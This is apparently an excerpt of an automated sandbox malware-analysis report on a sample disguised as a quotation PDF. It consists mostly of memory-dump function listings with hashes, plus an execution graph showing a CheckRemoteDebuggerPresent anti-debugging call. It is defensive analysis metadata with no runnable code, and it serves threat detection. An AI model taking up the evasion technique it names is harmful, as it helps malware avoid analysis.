                            • Opcode ID: a88dca3aaf0c4817cd59286d4f3870eaf94d484d4f30882dab0aedef55f50645
                            • Instruction ID: 1c5328da2ab14a264deba65c253088f650a7da3f20e7f5146c2ba3955fa2b2d8
                            • Opcode Fuzzy Hash: a88dca3aaf0c4817cd59286d4f3870eaf94d484d4f30882dab0aedef55f50645
                            • Instruction Fuzzy Hash: 29D0127A149284AFC3019B68E405C447FB6EF1A764B2580E1FA898F337C235DD52CB81
                            Function 0137141C Relevance: .0, Instructions: 13COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917011557.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1370000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ae86b2c01b21e15fab0b97ed911eb26fe7466402e4716516ec0de58cfdc5ddec
                            • Instruction ID: 60c1f021a068186cccac52cfae166618ac9c5ecd8fc2fab635e5a1746da3acc7
                            • Opcode Fuzzy Hash: ae86b2c01b21e15fab0b97ed911eb26fe7466402e4716516ec0de58cfdc5ddec
                            • Instruction Fuzzy Hash: F8D02233805222EFEB3A4B11D4800383BB8DB0330978104EDC1D3E3042D728CC0292CB
                            Function 02DF8630 Relevance: .0, Instructions: 12COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917239980.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2df0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7c7a196a401fe999ff183cf40c2049d9e32ef525a5d64cf6b485ce2c71aa51e9
                            • Instruction ID: 34098ff2b3eceead6e3cbdc48f384054b8a6b5e1321a5145581c951e1d47e11f
                            • Opcode Fuzzy Hash: 7c7a196a401fe999ff183cf40c2049d9e32ef525a5d64cf6b485ce2c71aa51e9
                            • Instruction Fuzzy Hash: 4DC04C1411D2C24EC7036B348D51045BF62EF135047AA00D6C2D39B2A3DA1409A5C796
                            Function 01370A9A Relevance: .0, Instructions: 12COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917011557.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1370000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8ae9c1b62ae0494007df4b8c2499c54845ca5d2e95ba2470bb4e5bbb790bb6b2
                            • Instruction ID: b6809618247d2ef22a6075468ac42b76d00b891e9c91df1993477dbb9da44d25
                            • Opcode Fuzzy Hash: 8ae9c1b62ae0494007df4b8c2499c54845ca5d2e95ba2470bb4e5bbb790bb6b2
                            • Instruction Fuzzy Hash: D1D05E32904221CBDB358F06E408258B7F5BB05309B8A81A9D586A7106D738E8019B81
                            Function 01373045 Relevance: .0, Instructions: 12COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917011557.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1370000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3b0e6810d27461212c81797e66b660cc5d726b8eff483819d47cc6110102a53d
                            • Instruction ID: 663df28b57c89f8e1d7c7fd03bfacdfa2d9b05f61a3b12a18176ee538850c3a8
                            • Opcode Fuzzy Hash: 3b0e6810d27461212c81797e66b660cc5d726b8eff483819d47cc6110102a53d
                            • Instruction Fuzzy Hash: 6CD01730511102CBD7399F59F0587B97BB1B705308F0044BED51A82580D7380980CF00
                            Function 08A5CFF0 Relevance: .0, Instructions: 12COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1941165349.0000000008A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A40000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_8a40000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 14f56ec62cf16f89dc5f10e6500515d705dbc115a4f9e763b0ce6c3d952fda5c
                            • Instruction ID: 08025b87e748d0d06cd061ba82ea95b18f70067a8dd36fbe2b62895236b52883
                            • Opcode Fuzzy Hash: 14f56ec62cf16f89dc5f10e6500515d705dbc115a4f9e763b0ce6c3d952fda5c
                            • Instruction Fuzzy Hash: F9C02B3005B704DFC3141354B40D77832AC9307627FC07424C90F03C11477980D1CB49
                            Function 01371CEE Relevance: .0, Instructions: 11COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917011557.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1370000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 81c1a97328ebdc7ee9f07dea2b1fe5fbcb94cf8e160ea05e74accb83e51f0100
                            • Instruction ID: 7816f5e62d00e2c2260584810c2aa8ff493e7468d4a30d78b140bb9aa8537de4
                            • Opcode Fuzzy Hash: 81c1a97328ebdc7ee9f07dea2b1fe5fbcb94cf8e160ea05e74accb83e51f0100
                            • Instruction Fuzzy Hash: 5BD06C75E01209AFEB50DBA8E890AADBAB1BB48B14F104519E41277280CA3458949B15
                            Function 02DFCA28 Relevance: .0, Instructions: 8COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917239980.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2df0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: af8e06a732ca707132f27ef7a83e288a845aad2dfe2584e40d54ff240b01922d
                            • Instruction ID: 2ad57114494cc740969b95bee8f444b209d5990da35e5c480c7824bf6c3857fe
                            • Opcode Fuzzy Hash: af8e06a732ca707132f27ef7a83e288a845aad2dfe2584e40d54ff240b01922d
                            • Instruction Fuzzy Hash: B7C09276140208EFC700DF69E844C45BBB8FF1976071180A1FA088B332C732E820DA94
                            Function 02DFAB10 Relevance: .0, Instructions: 8COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917239980.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2df0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                            • Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
                            • Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                            • Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94
                            Function 013772A0 Relevance: .0, Instructions: 8COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917011557.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1370000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 983af967a59374bd8654f784f3578fb1d50c9ae1805255fe78c341206ea3919d
                            • Instruction ID: 74c232bb7b3d5b6208e297100d3a562c84cf52e03aab7b22293ea225c1d496e3
                            • Opcode Fuzzy Hash: 983af967a59374bd8654f784f3578fb1d50c9ae1805255fe78c341206ea3919d
                            • Instruction Fuzzy Hash: DEB0926A90924A2BD321633248940A87791ADB202C3DA0988B0E880021E82C440AC115
                            Function 02DFEAE0 Relevance: .0, Instructions: 7COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917239980.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2df0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f379d1ecc7ef8cbbfab5571c1485aa804b3aa848f2c07c011cb662af1fed1828
                            • Instruction ID: d321f73d3a556db82ed47408d0f12fd8d6b55b37aaf7e6285a6beb090b3422dd
                            • Opcode Fuzzy Hash: f379d1ecc7ef8cbbfab5571c1485aa804b3aa848f2c07c011cb662af1fed1828
                            • Instruction Fuzzy Hash: 9EB0123600030CEBC7449F84E804C95BF6DEB58B11F00C025F60906111CB73F862DBD8
                            Function 01378CB0 Relevance: .0, Instructions: 7COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917011557.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1370000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d200006d66dfcaf3ad5dd5c1c75a4ffe651a9ea33eed7fff1a75258716443a08
                            • Instruction ID: 308734e347fe5fbfc39d01466d26648a0473cab39bdc6a53ba3d68073832f9aa
                            • Opcode Fuzzy Hash: d200006d66dfcaf3ad5dd5c1c75a4ffe651a9ea33eed7fff1a75258716443a08
                            • Instruction Fuzzy Hash: 93B01230240208CFC200DB5DD444C0033FCAF49A0434000D0F1098B731C721FC00CA40
                            Function 013772A9 Relevance: .0, Instructions: 6COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917011557.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1370000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4bf7e9d1bda38c04ba44a7822476c9e50237fcaf8bdce242ccbf1b3921e35290
                            • Instruction ID: 2f306858a200356ed73294fc6bfa576f0499a6876826b06bb0b8b8a8d6b7d768
                            • Opcode Fuzzy Hash: 4bf7e9d1bda38c04ba44a7822476c9e50237fcaf8bdce242ccbf1b3921e35290
                            • Instruction Fuzzy Hash: 6AA0027BA6A20657EB497623891508871A3BEF31AC7DE15C851EC85516E92E840E950C
                            Function 01370890 Relevance: .0, Instructions: 5COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917011557.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1370000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d7c912f711f51ee4efecc33525053d8c2aa85264641637c7b6611f24d9ce97b5
                            • Instruction ID: a2d13f94ba4d99fa67fc5c304a6a92c1434203b431fdce53a2ddd0c9aa123a8e
                            • Opcode Fuzzy Hash: d7c912f711f51ee4efecc33525053d8c2aa85264641637c7b6611f24d9ce97b5
                            • Instruction Fuzzy Hash: 6C900231445A0C8F45502795B40D559B75DA5445157C050D1A50E41D065F6674104695

                            Non-executed Functions

                            Function 02DBB1A8 Relevance: 1.5, Strings: 1, Instructions: 238COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917165729.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2db0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID: \V!m
                            • API String ID: 0-1999779074
                            • Opcode ID: a6b98f64ab98123a66e14d0f2e7dde044b188f0a50a60b19688ff49acfdf2056
                            • Instruction ID: 0e26ad3223dde3796a3f69dbc76763ed5f7265447b9203a05df386c9a073b328
                            • Opcode Fuzzy Hash: a6b98f64ab98123a66e14d0f2e7dde044b188f0a50a60b19688ff49acfdf2056
                            • Instruction Fuzzy Hash: FD914B70E00249CFDB11CFA9D8957EEBBF2BF88718F14812AD846A7354EB749845CB91
                            Function 01374989 Relevance: 1.5, Strings: 1, Instructions: 219COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917011557.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1370000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID: L+8^
                            • API String ID: 0-1607618960
                            • Opcode ID: 70ed6c59c42af70bdc744cbe39786db942f4e0230cbadf3d3a6543679eb2de67
                            • Instruction ID: f457a961f53c02d1a66decfbccbb12ee24e7c4f1ffa2c4971f55135b49f2d085
                            • Opcode Fuzzy Hash: 70ed6c59c42af70bdc744cbe39786db942f4e0230cbadf3d3a6543679eb2de67
                            • Instruction Fuzzy Hash: 26912630A0420ACFDB25CF49D584BAAF7F2FB85308F54C666C4159BA49E378BA85CF50
                            Function 02DFEC48 Relevance: .7, Instructions: 659COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917239980.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2df0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ecf59e7f100ef7a397912b42f4d4ae8568f466652b9675d9761d12c57760cbe9
                            • Instruction ID: 2febda6bb45a3487038800ce7fa40c992ee11e9d526f76ab5d044803f79aabef
                            • Opcode Fuzzy Hash: ecf59e7f100ef7a397912b42f4d4ae8568f466652b9675d9761d12c57760cbe9
                            • Instruction Fuzzy Hash: 6F422A35A00219DFCB54DF64C844A99BBB2FF89300F1685E9E649AB361DB31ED85CF90
                            Function 013722F2 Relevance: .4, Instructions: 429COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917011557.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1370000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2422c11b30782c3b542ee3e7148d5eb8c9705138dd2976da612a787fe004cd23
                            • Instruction ID: 041398e41361df37d1fd06f955d69fa82408e14c86624faeef2139ae6fcfa011
                            • Opcode Fuzzy Hash: 2422c11b30782c3b542ee3e7148d5eb8c9705138dd2976da612a787fe004cd23
                            • Instruction Fuzzy Hash: DEE125718047A3CFC7A5CF78C5865C5BBB1FF5232432986BED9804A902E3359966CF92
                            Function 02DB0040 Relevance: .4, Instructions: 412COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917165729.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2db0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2ebb1050d0f5d48d7cadb7ec6d3bb1d85b02ca7d93fd6d8f941720ea605adf78
                            • Instruction ID: 4f6cc7cfed23217d4762af8b4f2890456b75a2d60ea09cb7e4f761dcbe66cc6b
                            • Opcode Fuzzy Hash: 2ebb1050d0f5d48d7cadb7ec6d3bb1d85b02ca7d93fd6d8f941720ea605adf78
                            • Instruction Fuzzy Hash: B6F12370A00616CFDB09CBA9C4A476EFBF2BF88301F648628D55697780CB34ED45CB95
                            Function 02DF1248 Relevance: .3, Instructions: 325COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917239980.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2df0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 84da1324109177e8bdfc6871e01755ebefa213095916b7d1c3ec2bc9c10c7245
                            • Instruction ID: 4fc258981c522555f5d815ce602c1768c02de0353bb1dea33cf8ddd6f346442e
                            • Opcode Fuzzy Hash: 84da1324109177e8bdfc6871e01755ebefa213095916b7d1c3ec2bc9c10c7245
                            • Instruction Fuzzy Hash: B7D11B34A00605CFDB54CFA9C584AADB7F2BF88715F26C5A9E509AB361CB34EC81CB54
                            Function 02DBDA28 Relevance: .2, Instructions: 207COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917165729.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2db0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: be21e634ac34a0f030a3b305fb02f5ebbcc5d16b7159a765f382d8644831174e
                            • Instruction ID: 9f2e54926f92d1448e3eaa8f12d768ecbf29eae56123fb8e6389bd622f01c906
                            • Opcode Fuzzy Hash: be21e634ac34a0f030a3b305fb02f5ebbcc5d16b7159a765f382d8644831174e
                            • Instruction Fuzzy Hash: 4F81CEB4A09218CFDB15CFA9D494BEDB7B6EF4A301F209069D44AA7350DB789D85CF10
                            Function 02DBDA38 Relevance: .2, Instructions: 204COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917165729.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2db0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4b0b709f93204c4e084d18d04adf86ba5b7bcc6f71b9656f87cf9b6f2c1e1dff
                            • Instruction ID: 98aeb930e9c33efb2783902092b48e5e910776e7bd460a1bbb821dabf87eb977
                            • Opcode Fuzzy Hash: 4b0b709f93204c4e084d18d04adf86ba5b7bcc6f71b9656f87cf9b6f2c1e1dff
                            • Instruction Fuzzy Hash: FD81CEB0A09208CFDB55CFA9D494BEDB7B6EF4A301F209069D44AA7351DB78AD85CF10
                            Function 01376470 Relevance: .2, Instructions: 203COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917011557.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1370000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3a9b88142c1987e0cdeda0064208be46937e982bc70eec6021a4e3b12be703e1
                            • Instruction ID: b2ca46b195e1d8ae5d71937db61129f64e355726fcd9bd35c027db26eccd3e26
                            • Opcode Fuzzy Hash: 3a9b88142c1987e0cdeda0064208be46937e982bc70eec6021a4e3b12be703e1
                            • Instruction Fuzzy Hash: E1912B70A10608CFE735CF58E4A5B99B7B7FB44318F1482A9D409AB796D37DA884CF50
                            Function 01376480 Relevance: .2, Instructions: 201COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917011557.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1370000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0bd9f05a791c6fb140a05cb89b8877b59405c108ca3272b0d00ac03891ceaa83
                            • Instruction ID: efd5de499262187e5f459010dac8697fe2ae5d2b0540fd2a62a269351eb6cf95
                            • Opcode Fuzzy Hash: 0bd9f05a791c6fb140a05cb89b8877b59405c108ca3272b0d00ac03891ceaa83
                            • Instruction Fuzzy Hash: 84912A70A10608CFE735CF58E4A9B99B7B7FB44318F1481A9D409AB796D37DA884CF90
                            Function 02DBDD20 Relevance: .2, Instructions: 197COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917165729.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2db0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e398c7e7ab36b3fe5dd36ca664ed9a57a6aae23ace09cf71f0fb93848183bfdc
                            • Instruction ID: ccdf0fb4379067c470466383395e9bb385080064f51fc36d913faebe03fb03d3
                            • Opcode Fuzzy Hash: e398c7e7ab36b3fe5dd36ca664ed9a57a6aae23ace09cf71f0fb93848183bfdc
                            • Instruction Fuzzy Hash: 2C81AEB4E09208CFDB55CFA9D494AADBBB6EF8A301F209069D44AA7350D7789D85CF10
                            Function 02DD89C0 Relevance: .2, Instructions: 195COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917223338.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2dd0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6b6b3e77cb564a10dadb15caa4a8e8bef0b8347aa2d163b120a626d1cdef05bf
                            • Instruction ID: 04de8bea70454b2df76a5c77f25a3b0d4edfbdf2eb4e63f033d4ca42df201a99
                            • Opcode Fuzzy Hash: 6b6b3e77cb564a10dadb15caa4a8e8bef0b8347aa2d163b120a626d1cdef05bf
                            • Instruction Fuzzy Hash: 5381F374905608CFDB15DFA9E498BADBBF1FB49315F10A029D40AA7390DB78AD86CF00
                            Function 02DB27C9 Relevance: .2, Instructions: 191COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917165729.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2db0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: eb85659c03ce1ffda0cd8ee1a540fbf208ece9ce1e0280ff0ba1405fe69a30fd
                            • Instruction ID: 433ced776b8f62ed8f7fdd3c25e169b8b2a9864762f842f1f105cdb39e684abf
                            • Opcode Fuzzy Hash: eb85659c03ce1ffda0cd8ee1a540fbf208ece9ce1e0280ff0ba1405fe69a30fd
                            • Instruction Fuzzy Hash: 9A81EF75A05218CFDB25DFA8D858BEDBBB1FF49304F108169D84AA7394DB389D86CB10
                            Function 02DB27D8 Relevance: .2, Instructions: 190COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917165729.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2db0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 158f80b2613e757c1309f67009e480d73ee87c364e22f029896a77cf2be65dae
                            • Instruction ID: 912f708dd12b4e27d914d1d7779ef2822e5a81cf24518da79883797bb0541c96
                            • Opcode Fuzzy Hash: 158f80b2613e757c1309f67009e480d73ee87c364e22f029896a77cf2be65dae
                            • Instruction Fuzzy Hash: E181FE75A05218CBDB15DFA8D858BEDBBB5FF49300F108169D84AA3394DB389D86CF00
                            Function 08A5CCD8 Relevance: .2, Instructions: 183COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1941165349.0000000008A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A40000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_8a40000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d6e093ccf82d745410f00120da9044048a523bcf093a22dc934d2473ff0e1017
                            • Instruction ID: e624af9d687f4670a1925e508fac398f06b53b3fa013fcadf47c9ffc5af24022
                            • Opcode Fuzzy Hash: d6e093ccf82d745410f00120da9044048a523bcf093a22dc934d2473ff0e1017
                            • Instruction Fuzzy Hash: 85715770D04318CFDB64CFA9C844BADBBB5BF4A322F109069D809A7659EB7459C6CF00
                            Function 08A4000A Relevance: .1, Instructions: 79COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1941165349.0000000008A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A40000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_8a40000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bbccf18233fbb8cf4871696114866c43d6d45923211b14bb6ac36c76b39933b3
                            • Instruction ID: 51e58a90cc6f012c0c338dd0a5b1e76ac946d4fb34ec8a81fed575fca9e910f7
                            • Opcode Fuzzy Hash: bbccf18233fbb8cf4871696114866c43d6d45923211b14bb6ac36c76b39933b3
                            • Instruction Fuzzy Hash: 76311E71D057948FD729CF2B8844399BFF2AFC6214F08D1EAC548AB526D7740A829F11
                            Function 08A40040 Relevance: .1, Instructions: 64COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1941165349.0000000008A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A40000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_8a40000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d0178dd0a5b5c5cddcbc2d2b1a2861c07689b6866cd2311c5cf9903bc4e3dfd6
                            • Instruction ID: e33d267f10bc1d1573ac1d0d5a7e9328f7c9e26e4ae6f7ce93bbd502933d9405
                            • Opcode Fuzzy Hash: d0178dd0a5b5c5cddcbc2d2b1a2861c07689b6866cd2311c5cf9903bc4e3dfd6
                            • Instruction Fuzzy Hash: 5121A871D056288BEB2CCF1B884479ABAF6BBC9300F04D1FAD50CA6654DB740A829E00
                            Function 02DD59A0 Relevance: 5.0, Strings: 4, Instructions: 20COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917223338.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2dd0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID: $$($+$B
                            • API String ID: 0-3110121830
                            • Opcode ID: 802a03f899062acb3b129f81c411256f0557545932009990773f1282adacf098
                            • Instruction ID: 8a104e3623ca9dd9c76ecac26bb1d113b5ce818650438ef8d396e2570f1830f4
                            • Opcode Fuzzy Hash: 802a03f899062acb3b129f81c411256f0557545932009990773f1282adacf098
                            • Instruction Fuzzy Hash: 2BF09270911A98CADB60CF54E94879D77B1AB01314F9098E7D51AB6240C3785ED4CF05

                            Execution Graph

                            Execution Coverage:8.5%
                            Dynamic/Decrypted Code Coverage:100%
                            Signature Coverage:0%
                            Total number of Nodes:5
                            Total number of Limit Nodes:0
                            execution_graph 25745 66198d0 DuplicateHandle 25746 6619966 25745->25746 25747 2bb70a8 25748 2bb70ec CheckRemoteDebuggerPresent 25747->25748 25749 2bb712e 25748->25749

                            Executed Functions

                            Function 02BB70A0 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 802 2bb70a0-2bb712c CheckRemoteDebuggerPresent 805 2bb712e-2bb7134 802->805 806 2bb7135-2bb7170 802->806 805->806
                            APIs
                            • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 02BB711F
                            Memory Dump Source
                            • Source File: 00000006.00000002.2683391401.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_2bb0000_aspnet_compiler.jbxd
